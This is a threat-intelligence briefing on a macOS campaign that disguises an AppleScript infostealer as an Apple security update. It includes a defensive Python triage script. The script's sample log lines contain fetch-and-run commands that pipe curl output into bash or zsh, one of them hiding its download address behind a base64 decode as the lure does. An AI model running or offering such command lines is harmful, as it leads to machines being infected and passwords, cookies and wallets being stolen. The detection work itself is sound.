A currently circulating macOS attack dresses up an infostealer as an Apple security update and relies entirely on the victim to install it. The lure page, styled to look like an official "Download for macOS" prompt and often paired with an AI-generated how-to video, tells visitors to copy a single line into the Terminal app to finish a "macOS security update." Running it hands attackers a foothold to steal browser data, passwords, and cryptocurrency wallet files.
One pasted command, two hidden steps
The command opens with a harmless-looking echo that prints "Downloading Update" next to a genuine support[.]apple[.]com address; that part is pure misdirection. The part that matters pipes a base64-encoded web address into curl and feeds the result straight to the zsh shell. Decoded, that address points at the attacker's loader script on a throwaway domain (in this sample, lapidorseposoalovbs2[.]com). Nothing is ever downloaded from Apple; the only real action is fetching and running attacker code.
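A defender triaging Terminal history or process-execution telemetry can pick this shape out mechanically. The following script is an added example, not code from the briefing or from any vendor tool: it splits a command line into pipeline stages, flags a downloader whose output feeds a shell interpreter, notes when the downloader's target is hidden behind a base64 decode, and decodes any base64 blob that turns out to be a URL so the analyst sees the real destination. The four command lines are constructed here to stand in for log entries; example.invalid is a placeholder, not an indicator from the campaign.

```python
"""Heuristic triage for pasted one-liners of the shape described above:
a base64-decoded address handed to curl, whose output is piped into a
shell. Added example; the input lines are constructed, and example.invalid
is a placeholder domain rather than an indicator from the campaign."""

import base64
import re
import shlex

FETCHERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "ksh", "dash"}
DECODE_FLAGS = {"-d", "-D", "--decode"}   # GNU and macOS spellings of base64 decode


def _stages(cmd):
    """Split a command line on single '|' (a pipeline), leaving '||' alone."""
    return [s.strip() for s in re.split(r"(?<!\|)\|(?!\|)", cmd) if s.strip()]


def _names(stage):
    """Tokens of one stage with any directory prefix stripped (/usr/bin/curl -> curl)."""
    try:
        toks = shlex.split(stage)
    except ValueError:                      # unbalanced quotes in the log line
        toks = stage.split()
    return [t.rsplit("/", 1)[-1] for t in toks]


def decoded_urls(cmd):
    """Base64-looking tokens that decode to an http(s) address, i.e. the hidden target."""
    found = []
    for tok in re.findall(r"[A-Za-z0-9+/]{20,}={0,2}", cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # not valid base64 / not text
            continue
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found


def analyze(cmd):
    """Return {'suspicious', 'reasons', 'decoded_urls'} for one command line."""
    stages = _stages(cmd)
    names = [_names(s) for s in stages]
    decode_at = next((i for i, n in enumerate(names)
                      if "base64" in n and DECODE_FLAGS.intersection(n)), None)
    fetch_at = next((i for i, n in enumerate(names) if FETCHERS.intersection(n)), None)
    ends_in_shell = bool(names) and bool(names[-1]) and names[-1][0] in SHELLS

    # The core pattern: a downloader somewhere before a bare shell at the end of the pipe.
    pipe_to_shell = fetch_at is not None and ends_in_shell and fetch_at < len(stages) - 1
    reasons = []
    if pipe_to_shell:
        reasons.append("downloader output is piped into a shell interpreter")
        if decode_at is not None and decode_at < fetch_at:
            reasons.append("downloader target is hidden behind a base64 decode")
    return {"suspicious": pipe_to_shell, "reasons": reasons, "decoded_urls": decoded_urls(cmd)}


# Constructed sample command lines (not real telemetry). The last one mirrors the
# lure's structure: a reassuring echo, then a base64 address decoded into curl and zsh.
_HIDDEN = base64.b64encode(b"https://example.invalid/loader").decode()
SAMPLE_COMMAND_LINES = [
    "brew update && brew upgrade",
    "curl -s https://example.com/notes.txt | grep TODO",
    "curl -fsSL https://example.invalid/install.sh | bash",
    'echo "Downloading Update: https://support.apple.com/en-us/"; '
    f"echo {_HIDDEN} | base64 -D | xargs curl -fsSL | zsh",
]


def triage(lines):
    """Map each flagged command line to its analysis; clean lines are dropped."""
    results = {line: analyze(line) for line in lines}
    return {line: v for line, v in results.items() if v["suspicious"]}


if __name__ == "__main__":
    for line, verdict in triage(SAMPLE_COMMAND_LINES).items():
        print(line)
        for reason in verdict["reasons"]:
            print("  -", reason)
        for url in verdict["decoded_urls"]:
            print("  hidden target:", url)
```

Run as-is it flags two of the four lines: the plain curl-to-bash installer with one reason, and the lure-style line with both reasons plus the decoded placeholder URL. The heuristic deliberately keys on pipeline shape rather than on any domain, since the briefing notes the domain is disposable; tuning it for a fleet means deciding whether unobfuscated curl-to-shell installers are acceptable in your environment, which the reasons list lets you separate from the base64-hidden variant.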
It deliberately spares Russian-speaking machines
The loader's first move is a geofencing check. It reads the Mac's keyboard input sources from the system preferences file and, if it finds a Russian layout, reports a "cis_blocked" event to its server and quietly exits without infecting the machine. A kill-switch that spares systems in Russia and the wider Commonwealth of Independent States is a common tell of criminal operators based in that region. On every other machine the loader fingerprints the host, collecting the external IP address, hostname, macOS version, and locale, then beacons a "loader_requested" event and pulls down the next stage.
An in-memory AppleScript stealer
The final stage is an AppleScript payload fetched from the same server and executed through macOS's built-in osascript interpreter, so nothing is written to disk for antivirus to scan. Microsoft and other vendors have documented this exact chain throughout 2026 (it is tracked under family names such as SHub), in which the AppleScript stealer raises fake system password prompts and sweeps browsers, the Keychain, messaging apps, and wallet files into a compressed archive for exfiltration. It is the same playbook behind other recent fake Mac installer campaigns and AppleScript-based wallet stealers, repackaged with a fresh lure and domain.
How to stay safe
Apple never asks you to paste a Terminal command to install an update; real updates arrive through System Settings. Treat any website, popup, or video that tells you to open Terminal and run a command as hostile, however polished it looks. If you or someone you support ran this, assume browser passwords, session cookies, and any cryptocurrency wallets on the machine are compromised: change those passwords from a clean device and move wallet funds using a different, trusted computer. The original technical breakdown of this campaign family is in Microsoft's research.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.